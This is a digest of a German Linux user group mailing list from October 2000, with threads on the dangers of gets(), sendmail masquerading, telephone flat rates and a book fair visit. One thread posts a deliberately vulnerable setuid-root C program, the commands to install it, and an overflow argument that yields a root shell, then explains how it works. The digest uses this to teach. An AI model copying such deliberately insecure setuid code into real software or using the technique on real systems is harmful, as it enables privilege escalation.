[EMAIL PROTECTED] - Digest Friday, October 20 2000 Volume 01 : Number 144
----------------------------------------------------------------------
Date: Fri, 20 Oct 2000 07:35:58 +0200
From: "Wolf, Markus, Triaton/DE" <[EMAIL PROTECTED]>
Subject: [PUG] FW: g++ Compiler
Hallo zusammen,
hier ein weitergeleitetes Mail von Christian Stalp (dessen Mails an die
Pug-Liste leider nicht ankommen):
Markus
> ---------- Weitergeleitete Nachricht ----------
> Subject: G++ Compiler
> Date: Wed, 18 Oct 2000 18:00:36 +0200
> From: Christian Stalp <[EMAIL PROTECTED]>
>
>
> Kennt sich jemand aus mit den Abgr�nden des GNU-C-Compiler?
>
> Bei benutzung der Standartfunktion gets oder getc, getchar usw. bekomme
> ich
> zun�chst eine Warnung - "the 'gets' function is dangerous and should not
> be
> used.
>
> Das Programm wird jedoch compiliert (mit Warnung), bei der Ausf�hrung wird
> die
> Funktion gets() aber v�llig ignoriert. Ich habe das Programm dann
> auskommentiert und zusammengestrichen, bis nur noch DAS �brigblieb:
>
> #include<stdio.h>
>
> void main(void)
> {
> float zahl1, zahl2;
> char op[4];
> printf("\n Anfangszahl eingeben: ");
> scanf("%f",&zahl1);
> printf("\n%f",zahl1);
> gets(op);
> printf("\n");
> puts(op);
> }
>
> Wenn ich die printf und scanfs wegkommentiere funktioniert es auf einmal,
> aber
> das kann nicht Sinn der �bung sein :-|
> -------------------------------------------------------
>
------------------------------
Date: Fri, 20 Oct 2000 08:30:10 +0200
From: Martin Schmitt <[EMAIL PROTECTED]>
Subject: Re: [PUG] FW: g++ Compiler
* Wolf, Markus, Triaton/DE ([EMAIL PROTECTED]) wrote/schrieb:
> hier ein weitergeleitetes Mail von Christian Stalp (dessen Mails an die
> Pug-Liste leider nicht ankommen):
Oct 18 17:46:53 tux sendmail[27921]: RAA27921: ruleset=check_mail,
arg1=<chris@YAST_ASK>, relay=A2a8c.pppool.de [213.6.42.140], reject=501
<chris@YAST_ASK>... Sender domain must exist
^^^^^^^^^^^^^^^^^^^^^^^^
Christian: Bitte beim Versenden eine g�ltige Domain verwenden, z.B.
sinnigerweise "stalp.de". Zum Bleistift:
# who I masquerade as (null for no masquerading) (see also $=M)
DMstalp.de
Zus�tzlich beim Versenden von Mails �ber PPP-Accounts m�glichst immer den
SMTP-Server des Providers als Relay verwenden. Zum Beispiel:
# "Smart" relay host (may be null)
DSsmtp.meinprovider.de
Dann klappt das. :-)
Das ganze Internet ist voll mit Wahnsinnigen, die einen Server sofort als
Spam-Relay mi�brauchen, wenn sie eine L�cke finden, deshalb mu� man leider
alles, was nicht 100%ig in Ordnung ist, zur�ckweisen. Das war fr�her auch
mal anders. :-(
- -martin
- --
665: Neigbour of the Beast
------------------------------
Date: Fri, 20 Oct 2000 08:43:50 +0200
From: Martin Schmitt <[EMAIL PROTECTED]>
Subject: [PUG] Kostenlose Ortsgespraeche bei den Briten
Hi!
In England werden angeblich demn�chst die Telefongeb�hren f�r Ortsgespr�che
abgeschafft und amerikanische Verh�ltnisse eingef�hrt:
http://uk.news.yahoo.com/001019/15/amotu.html
Es besteht also doch noch Hoffnung f�r Europa. Wenn das eines Tages auch in
Deutschland passiert, wird es eine Renaissance der kleinen, �rtlichen
Internet-Provider geben. Das ist doch sch�n. :-)
Falls jemand den Text nicht versteht: "Unmetered Service" entspricht dem
sch�nen deutschen Wort "Flatrate".
Ciao,
- -martin
- --
It's not a bug, it's tradition!
------------------------------
Date: Fri, 20 Oct 2000 08:54:19 +0200
From: Christopher Ruehl <[EMAIL PROTECTED]>
Subject: Re: [PUG] FW: g++ Compiler
> Hallo zusammen,
>
> hier ein weitergeleitetes Mail von Christian Stalp (dessen Mails an die
> Pug-Liste leider nicht ankommen):
warscheinlich hat er vergessen beim Sendmail den "DMmailer.was.auchimmer.de"
(sendmail.cf) zu maskieren damit sein rechner als registrierte Domain im Mail-
header erscheint. ( -> spammailfilter nehmen nur mail von registrierten
domains an ... wenn so konfiguriert)
genauer:
DMrechner.der.erscheinen.soll
^^=Domain Masquade
^^^^^^=Domain/Host der eingetragen wird.
>
> Markus
>
>
> > ---------- Weitergeleitete Nachricht ----------
> > Subject: G++ Compiler
> > Date: Wed, 18 Oct 2000 18:00:36 +0200
> > From: Christian Stalp <[EMAIL PROTECTED]>
> >
> >
> > Kennt sich jemand aus mit den Abgr�nden des GNU-C-Compiler?
> >
> > Bei benutzung der Standartfunktion gets oder getc, getchar usw. bekomme
> > ich
> > zun�chst eine Warnung - "the 'gets' function is dangerous and should not
> > be
> > used.
gets ist deswegen dangerous weil:
du bestimmt einen segm.fault bekommst wenn die Eingabe mehr als
x - Zeichen ..(in dem Beispiel x = 4 ).
Wenn das Programm mit Rootrechten / Daemon .. was auch immer la"uft,
produzierst du wieder einen Exploid ... DESWEGEN DANGER!!
void my_gets( char *buffer , int size ) {
int steps=size;
while ( steps-- > 0 ) {
*buffer = (char) getchar();
if ( *buffer++ == EOF )
return;
}
}
sollte save sein, man uebergibt
my_gets( &op , sizeof(op) );
have a nice core-dump ;)
> >
> > Das Programm wird jedoch compiliert (mit Warnung), bei der Ausf�hrung wird
> > die
> > Funktion gets() aber v�llig ignoriert. Ich habe das Programm dann
> > auskommentiert und zusammengestrichen, bis nur noch DAS �brigblieb:
> >
> > #include<stdio.h>
> >
> > void main(void)
> > {
> > float zahl1, zahl2;
> > char op[4];
> > printf("\n Anfangszahl eingeben: ");
> > scanf("%f",&zahl1);
> > printf("\n%f",zahl1);
> > gets(op);
> > printf("\n");
> > puts(op);
> > }
> >
> > Wenn ich die printf und scanfs wegkommentiere funktioniert es auf einmal,
> > aber
> > das kann nicht Sinn der �bung sein :-|
> > -------------------------------------------------------
> >
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
- --
l�chle, denn es k�nnte schlimmer kommen .. und es kommt schlimmer
murfy's law
------------------------------
Date: Fri, 20 Oct 2000 08:57:07 +0200
From: Christopher Ruehl <[EMAIL PROTECTED]>
Subject: Re: [PUG] Kostenlose Ortsgespraeche bei den Briten
> Hi!
>
> In England werden angeblich demn�chst die Telefongeb�hren f�r Ortsgespr�che
> abgeschafft und amerikanische Verh�ltnisse eingef�hrt:
>
> http://uk.news.yahoo.com/001019/15/amotu.html
>
> Es besteht also doch noch Hoffnung f�r Europa. Wenn das eines Tages auch in
> Deutschland passiert, wird es eine Renaissance der kleinen, �rtlichen
> Internet-Provider geben. Das ist doch sch�n. :-)
>
> Falls jemand den Text nicht versteht: "Unmetered Service" entspricht dem
> sch�nen deutschen Wort "Flatrate".
>
dann kann ich dich ja (wenn das in DE auch kommt) anrufen und dort
anm(ail)->(aul)en
...
> Ciao,
>
> -martin
>
> --
> It's not a bug, it's tradition!
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
- --
l�chle, denn es k�nnte schlimmer kommen .. und es kommt schlimmer
murfy's law
------------------------------
Date: Fri, 20 Oct 2000 09:01:02 +0200
From: Christopher Ruehl <[EMAIL PROTECTED]>
Subject: Re: [PUG] FW: g++ Compiler
Dangerous:
[chris@pegasus chris]$ ./gettest
Anfangszahl eingeben: assdddddddddddddddddddddddddddddddddddddddddd
-1.999793
assdddddddddddddddddddddddddddddddddddddddddd
Segmentation fault (core dumped)
das passiert wie schon gesagt!
> Hallo zusammen,
>
> hier ein weitergeleitetes Mail von Christian Stalp (dessen Mails an die
> Pug-Liste leider nicht ankommen):
>
> Markus
>
>
> > ---------- Weitergeleitete Nachricht ----------
> > Subject: G++ Compiler
> > Date: Wed, 18 Oct 2000 18:00:36 +0200
> > From: Christian Stalp <[EMAIL PROTECTED]>
> >
> >
> > Kennt sich jemand aus mit den Abgr�nden des GNU-C-Compiler?
> >
> > Bei benutzung der Standartfunktion gets oder getc, getchar usw. bekomme
> > ich
> > zun�chst eine Warnung - "the 'gets' function is dangerous and should not
> > be
> > used.
> >
> > Das Programm wird jedoch compiliert (mit Warnung), bei der Ausf�hrung wird
> > die
> > Funktion gets() aber v�llig ignoriert. Ich habe das Programm dann
> > auskommentiert und zusammengestrichen, bis nur noch DAS �brigblieb:
> >
> > #include<stdio.h>
> >
> > void main(void)
> > {
> > float zahl1, zahl2;
> > char op[4];
> > printf("\n Anfangszahl eingeben: ");
> > scanf("%f",&zahl1);
> > printf("\n%f",zahl1);
> > gets(op);
> > printf("\n");
> > puts(op);
> > }
> >
> > Wenn ich die printf und scanfs wegkommentiere funktioniert es auf einmal,
> > aber
> > das kann nicht Sinn der �bung sein :-|
> > -------------------------------------------------------
> >
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
- --
l�chle, denn es k�nnte schlimmer kommen .. und es kommt schlimmer
murfy's law
------------------------------
Date: Fri, 20 Oct 2000 09:22:31 +0200
From: Martin Schmitt <[EMAIL PROTECTED]>
Subject: Re: [PUG] FW: g++ Compiler
* Christopher Ruehl ([EMAIL PROTECTED]) wrote/schrieb:
> DMrechner.der.erscheinen.soll
> ^^=Domain Masquade
Nur am Rande: Das "D" steht nicht f�r "Domain", sondern f�r "Deklaration",
weil hier im Rahmen der quasi selbsterkl�renden Sendmail-Philosophie das
"Makro" mit dem Namen "M" deklariert wird.
Frag jetzt aber bitte nicht, warum das ein "Makro" und keine Variable ist,
und warum "deklariert" und nicht zugewiesen wird...
- -martin
- --
Proof of sanity forged upon request
------------------------------
Date: Fri, 20 Oct 2000 09:29:38 +0200
From: Martin Schmitt <[EMAIL PROTECTED]>
Subject: Re: [PUG] Kostenlose Ortsgespraeche bei den Briten
* Christopher Ruehl ([EMAIL PROTECTED]) wrote/schrieb:
> dann kann ich dich ja (wenn das in DE auch kommt) anrufen und dort
> anm(ail)->(aul)en
> ...
Kein Problem. Ich la� dann hier das Eliza-Script von Emacs per Sprachein-
und -ausgabe ans Telefon gehen.
:-]
- -martin
- --
Reboot America.
------------------------------
Date: Fri, 20 Oct 2000 11:39:37 +0200
From: Patrick Glanz <[EMAIL PROTECTED]>
Subject: Re:[OT][PUG] Kostenlose Ortsgespraeche bei den Briten
Schoen, dass es noch Kinder gibt, die an den Weihnachtsmann glauben.
Ich hoer' schon die Telekomiker jammern: "Netzueberlastung in den
Ortsnetzen.... Gewinnwarnung ... Blahblah". Wenn sowas eingefuehrt wird, wird
das dann im Telekom-Jargon wahrscheinlich "village plus" heissen und 29,90- DM
pro Monat extra, unverbrauchte Einheiten verfallen......
Patrick
Martin Schmitt wrote:
> Hi!
>
> In England werden angeblich demn�chst die Telefongeb�hren f�r Ortsgespr�che
> abgeschafft und amerikanische Verh�ltnisse eingef�hrt:
>
> http://uk.news.yahoo.com/001019/15/amotu.html
>
> Es besteht also doch noch Hoffnung f�r Europa. Wenn das eines Tages auch in
> Deutschland passiert, wird es eine Renaissance der kleinen, �rtlichen
> Internet-Provider geben. Das ist doch sch�n. :-)
>
> Falls jemand den Text nicht versteht: "Unmetered Service" entspricht dem
> sch�nen deutschen Wort "Flatrate".
>
> Ciao,
>
> -martin
>
> --
> It's not a bug, it's tradition!
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
------------------------------
Date: Fri, 20 Oct 2000 11:28:28 +0200
From: Sebastian G�ndisch <[EMAIL PROTECTED]>
Subject: Re: [PUG] Exploits&Co war: FW: g++ Compiler
> Wenn das Programm mit Rootrechten / Daemon .. was auch immer la"uft,
> produzierst du wieder einen Exploid ... DESWEGEN DANGER!!
Hat jemand von euch eine ordentliche URL, wo beschrieben steht, was es mit
Exploits und Buffer Overflow auf sich hat? Ich will das auch mal kapieren, wenn
man davon spricht.
z.B. hat mir jemand mal erz�hlt, da� man z.B an eine Bild-Datei ein St�ck Code
(keine Ahnung welche Art) anh�ngen kann, wobei die Gr��e der Datei im Header
nicht richtig angegeben ist, und der Code soll beim Laden des Bildes irgendwie
zur Ausf�hrung kommen. Es war nur sehr wage was er mir beschrieben hat, aber
das will mir irgendwie nicht in den Kopf.
Sebastian
------------------------------
Date: Fri, 20 Oct 2000 11:44:29 +0200
From: Martin Schmitt <[EMAIL PROTECTED]>
Subject: Re: [OT][PUG] Kostenlose Ortsgespraeche bei den Briten
* Patrick Glanz ([EMAIL PROTECTED]) wrote/schrieb:
> Schoen, dass es noch Kinder gibt, die an den Weihnachtsmann glauben.
> Ich hoer' schon die Telekomiker jammern: "Netzueberlastung in den
> Ortsnetzen.... Gewinnwarnung ... Blahblah". Wenn sowas eingefuehrt wird, wird
> das dann im Telekom-Jargon wahrscheinlich "village plus" heissen und 29,90- DM
> pro Monat extra, unverbrauchte Einheiten verfallen......
Und wenn schon? Wenn ich mich daf�r wieder bei einem richtigen ISP
einw�hlen kann? Die fiktiven 30 Mark zzgl. 'nen Fuffi f�r den Provider
entsprechen wieder genau der aktuellen Flatrate, nur der Service w�re
wahrscheinlich besser.
- -martin
- --
Proof of sanity forged upon request
------------------------------
Date: 20 Oct 2000 12:51:33 +0200
From: Tina Bermann <[EMAIL PROTECTED]>
Subject: [PUG] Buchmesse - kurzer �berblick - ich fands toll und spannend
Hi,
von Euch wollte ja keiner mit. Selber schuld, so war ich gestern
alleine dort. �tsch. War toll!
Zusammenfassung:
0. Einleitung
1. Schnorren: lohnt sich!
2. Aussteller: lohnt sich!
3. Jobs und Kontakte: Lohnt sich!
4. Zukunft: Lohnt sich! Ich gehe n�chstes Jahr wieder hin!
5. Gesamteindruck Lohnt sich!
- ----> empfehlenswert!!!!!!!!!
http://www.buchmesse.de
l�uft noch bis Montag 14 Uhr
0. Einleitung
Ich war also nur einen Tag da und habe mir ausschlie�lich die Halle
4.1 angeschaut. Das ist die Halle mit dem Electronic Book und alles
was so dazu geh�rt. Mehr habe ich nicht geschafft.
Ach ein EBook hatte ich auch in der Hand - ganz sch�n schwer :-(
1. Schnorren
Um auf Martin�s Anmerkungen zur�ckzukommen was es alles auf Messen zu
schnorren gibt, erst mal diese Info:
Ich habe mitgebracht:
Suse-T-Shirt :-)
Ein Springseil
diverse Stifte
Kinderballspiel
Pralinen
Buchmessekalender
Zeitschriften,
CD-Rom Visitenkarten - da bekomme ich jetzt auch mal ein Angebot
was die kosten :-)
ein Beatle-Modellauto
etc... die Dutt war voll
Es gab folgende Versorgung:
Bars mit Prosecco, Flens, Kaffe, Bier, Weizenbier, Limo, Saft
Cola .....
Wei�wurst, K�seh�ppchen, �pfel, Lachsbr�tchen...
2. Aussteller
An Ausstellern waren neben einigen "Computer"-Verlagen eigentlich
haupts�chlich Dienstleister in dieser Halle.
Suse, O�Reilly, Gallileo-Press, adobe, Markt- und Technik und und und
ich wei� inzwischen auch wie man ein Fachbuch schreibt und wie man
an den Verlag rankommt
SAP und etliche andere E-Commerce Firmen
bol.de und andere Buchportale
ems, Step etc. Firmen die mit XML SGML arbeiten
jobpilot etc.
mehr fallen mir im Moment nicht ein
3. Jobs und Kontakte
Jobs gab es auf Nachfrage wider fast an jeder Ecke, klar in diesem
Bereich im wesentlichen auf der XML schiene - klar danach habe ich
ja auch gefragt und bei ebook und co ist das ja auch klar. Aber
auch Datenbankkenntnisse, Netzwerker f�r die protale etc.
Sah Prima aus! Und an Kontakten ist auch f�r mich als Freiberufler
einiges r�bergekommen.
4. Zukunft
Da gehe ich auf jeden-Fall wieder hin - von der Buchmesse habe ich
zwar nix gesehen aber die Entwicklungen in diesem Bereich sind echt
spannend.
5. Gesamteindruck
Ich kann es nur empfehlen. Hingehen!
Gru� Tina
------------------------------
Date: Thu, 19 Oct 2000 20:43:50 +0200
From: Bjoern Pfeiffer <[EMAIL PROTECTED]>
Subject: Re: [PUG] xcdroast
Hi!
Noch was anderes zum Thema:
xcdroast/cdrecord eigentlich mittlerweile sowas wie DAO brennen -
Audio ohne Pausen zwischen den Tracks?
Wei� da jemand was & wie?
Ciao - Bj�rn.
- --
\|/
t(h)ree
------------------------------
Date: Fri, 20 Oct 2000 17:41:18 +0200
From: Bjoern Pfeiffer <[EMAIL PROTECTED]>
Subject: Re: [PUG] FW: g++ Compiler
> > Wenn ich die printf und scanfs wegkommentiere funktioniert es auf einmal,
> > aber
> > das kann nicht Sinn der �bung sein :-|
scanf l��t offenbar noch ein Zeichen im stdin-stream stehen
(wahrscheinlich das newline).
#include<stdio.h>
void main(void)
{
float zahl1, zahl2;
char op[4];
char test;
printf("\n Anfangszahl eingeben: ");
scanf("%f",&zahl1);
printf("\n%\nf",zahl1);
test = getchar();
printf("getchar() done. -->%c<-- gelesen.\n", test);
gets(op);
printf("\n");
puts(op);
}
[bjoern@localhost C++]$ gets_test
Anfangszahl eingeben: 3
%
fgetchar() done. -->
<-- gelesen.
ee
ee
[bjoern@localhost C++]$
Jo. Es ist das newline :-)
- --
\|/
t(h)ree
------------------------------
Date: Fri, 20 Oct 2000 18:21:22 +0200
From: Tim Gesekus <[EMAIL PROTECTED]>
Subject: Re: [PUG] Exploits&Co war: FW: g++ Compiler
On Fri, Oct 20, 2000 at 11:28:28AM +0200, Sebastian G�ndisch wrote:
> Hat jemand von euch eine ordentliche URL, wo beschrieben steht, was es mit
> Exploits und Buffer Overflow auf sich hat? Ich will das auch mal kapieren, wenn
> man davon spricht.
Hier eine Mini-Programm das man mit einem Bufferoverflow exploiten kann.
- ----8<------8<-------
#include <stdio.h>
#include <unistd.h>
int main (int argc, char ** argv) {
char buffer2[20] = "/bin/echo";
char buffer[4] = "tim";
setuid (0);
strcpy (buffer,argv[1]);
execlp (buffer2,"echo",NULL);
return (1);
}
- ----8<------8<-------
Zum Uebersetzen: gcc Programmname
Dann als root:
chown root a.out
chmod 4755 a.out
Dann als normaler user:
./a.out 1234\/bin\/sh
Tata, schon hat man eine root-shell.
tim
- --
Tim Gesekus **** eMail: Tim Gesekus <[EMAIL PROTECTED]>
****************************************************************
hm, ist mir zu teuer ich nehm Schlecker-Hausmarke mit nem Schuss
Weichspueler, kriegt man ne schoene Stimme von. H.D.
****************************************************************
------------------------------
Date: Fri, 20 Oct 2000 18:33:13 +0200
From: Tim Gesekus <[EMAIL PROTECTED]>
Subject: Re: [PUG] Exploits&Co war: FW: g++ Compiler
On Fri, Oct 20, 2000 at 06:21:22PM +0200, Tim Gesekus wrote:
> On Fri, Oct 20, 2000 at 11:28:28AM +0200, Sebastian G�ndisch wrote:
Aeehh, eine Erklaerung sollte ich vielleich ja auch noch abgeben.
Wir bauen zwei Buffer: buffer und buffer2. Diese liegen direkt hinter-
einander im Speicher. Der eine ist 4 Zeichen lang, dann kommt der
naechste. strcpy kopiert das erste Kommandozeilenargument nach buffer.
1234\/bin\/sh ist jetzt aber leider viel groesser als als 4 Zeichen.
Also wird einfach munter in buffer2 weitergeschrieben. Der dann
/bin/sh enthaelt.
execlp sollte ja eigentlich /bin/echo ausfuehren, das macht er jetzt
nicht mehr. Sondern er startet eine Shell. Das das Programm setui root
laeuft und wir auch mit setuid (0); unsere id zu root wechseln, gehoert
die Shell die gestartet wird, root.
Das ganze gibts in vielen Varianten.
tim
> Hier eine Mini-Programm das man mit einem Bufferoverflow exploiten kann.
>
> ----8<------8<-------
>
> #include <stdio.h>
> #include <unistd.h>
>
> int main (int argc, char ** argv) {
>
> char buffer2[20] = "/bin/echo";
> char buffer[4] = "tim";
>
>
> setuid (0);
> strcpy (buffer,argv[1]);
> execlp (buffer2,"echo",NULL);
> return (1);
> }
>
> ----8<------8<-------
> Zum Uebersetzen: gcc Programmname
>
> Dann als root:
> chown root a.out
> chmod 4755 a.out
>
> Dann als normaler user:
> ./a.out 1234\/bin\/sh
> Tata, schon hat man eine root-shell.
>
> tim
>
> --
> Tim Gesekus **** eMail: Tim Gesekus <[EMAIL PROTECTED]>
> ****************************************************************
> hm, ist mir zu teuer ich nehm Schlecker-Hausmarke mit nem Schuss
> Weichspueler, kriegt man ne schoene Stimme von. H.D.
> ****************************************************************
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
- --
Tim Gesekus **** eMail: Tim Gesekus <[EMAIL PROTECTED]>
****************************************************************
hm, ist mir zu teuer ich nehm Schlecker-Hausmarke mit nem Schuss
Weichspueler, kriegt man ne schoene Stimme von. H.D.
****************************************************************
------------------------------
Date: Fri, 20 Oct 2000 20:35:41 +0200
From: Christopher Ruehl <[EMAIL PROTECTED]>
Subject: Re: [PUG] FW: g++ Compiler
> * Christopher Ruehl ([EMAIL PROTECTED]) wrote/schrieb:
>
> > DMrechner.der.erscheinen.soll
> > ^^=Domain Masquade
>
> Nur am Rande: Das "D" steht nicht f�r "Domain", sondern f�r "Deklaration",
> weil hier im Rahmen der quasi selbsterkl�renden Sendmail-Philosophie das
> "Makro" mit dem Namen "M" deklariert wird.
merci,
da war ich wohl nen bisschen vorschnell mit meiner DM=Domain Masq
aber maskieren macht er dann trotzdem :-)
>
> Frag jetzt aber bitte nicht, warum das ein "Makro" und keine Variable ist,
> und warum "deklariert" und nicht zugewiesen wird...
>
> -martin
>
> --
> Proof of sanity forged upon request
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
- --
l�chle, denn es k�nnte schlimmer kommen .. und es kommt schlimmer
murfy's law
------------------------------
Date: Fri, 20 Oct 2000 20:40:25 +0200
From: Christopher Ruehl <[EMAIL PROTECTED]>
Subject: Re: [PUG] Exploits&Co war: FW: g++ Compiler
hey TIM!
richtig gut erklaert!
..
> On Fri, Oct 20, 2000 at 06:21:22PM +0200, Tim Gesekus wrote:
> > On Fri, Oct 20, 2000 at 11:28:28AM +0200, Sebastian G�ndisch wrote:
>
> Aeehh, eine Erklaerung sollte ich vielleich ja auch noch abgeben.
>
> Wir bauen zwei Buffer: buffer und buffer2. Diese liegen direkt hinter-
> einander im Speicher. Der eine ist 4 Zeichen lang, dann kommt der
> naechste. strcpy kopiert das erste Kommandozeilenargument nach buffer.
> 1234\/bin\/sh ist jetzt aber leider viel groesser als als 4 Zeichen.
> Also wird einfach munter in buffer2 weitergeschrieben. Der dann
> /bin/sh enthaelt.
>
> execlp sollte ja eigentlich /bin/echo ausfuehren, das macht er jetzt
> nicht mehr. Sondern er startet eine Shell. Das das Programm setui root
> laeuft und wir auch mit setuid (0); unsere id zu root wechseln, gehoert
> die Shell die gestartet wird, root.
>
> Das ganze gibts in vielen Varianten.
>
> tim
>
> > Hier eine Mini-Programm das man mit einem Bufferoverflow exploiten kann.
> >
> > ----8<------8<-------
> >
> > #include <stdio.h>
> > #include <unistd.h>
> >
> > int main (int argc, char ** argv) {
> >
> > char buffer2[20] = "/bin/echo";
> > char buffer[4] = "tim";
> >
> >
> > setuid (0);
> > strcpy (buffer,argv[1]);
> > execlp (buffer2,"echo",NULL);
> > return (1);
> > }
> >
> > ----8<------8<-------
> > Zum Uebersetzen: gcc Programmname
> >
> > Dann als root:
> > chown root a.out
> > chmod 4755 a.out
> >
> > Dann als normaler user:
> > ./a.out 1234\/bin\/sh
> > Tata, schon hat man eine root-shell.
> >
> > tim
> >
> > --
> > Tim Gesekus **** eMail: Tim Gesekus <[EMAIL PROTECTED]>
> > ****************************************************************
> > hm, ist mir zu teuer ich nehm Schlecker-Hausmarke mit nem Schuss
> > Weichspueler, kriegt man ne schoene Stimme von. H.D.
> > ****************************************************************
> > ---------------------------------------------------------------------------
> > PUG - Penguin User Group Wiesbaden - http://www.pug.org
>
> --
> Tim Gesekus **** eMail: Tim Gesekus <[EMAIL PROTECTED]>
> ****************************************************************
> hm, ist mir zu teuer ich nehm Schlecker-Hausmarke mit nem Schuss
> Weichspueler, kriegt man ne schoene Stimme von. H.D.
> ****************************************************************
> ---------------------------------------------------------------------------
> PUG - Penguin User Group Wiesbaden - http://www.pug.org
- --
l�chle, denn es k�nnte schlimmer kommen .. und es kommt schlimmer
murfy's law
------------------------------
End of [EMAIL PROTECTED] - Digest V1 #144
************************************
--------------------------------------------------------------------------
Digest von "[EMAIL PROTECTED]" - http://www.pug.org
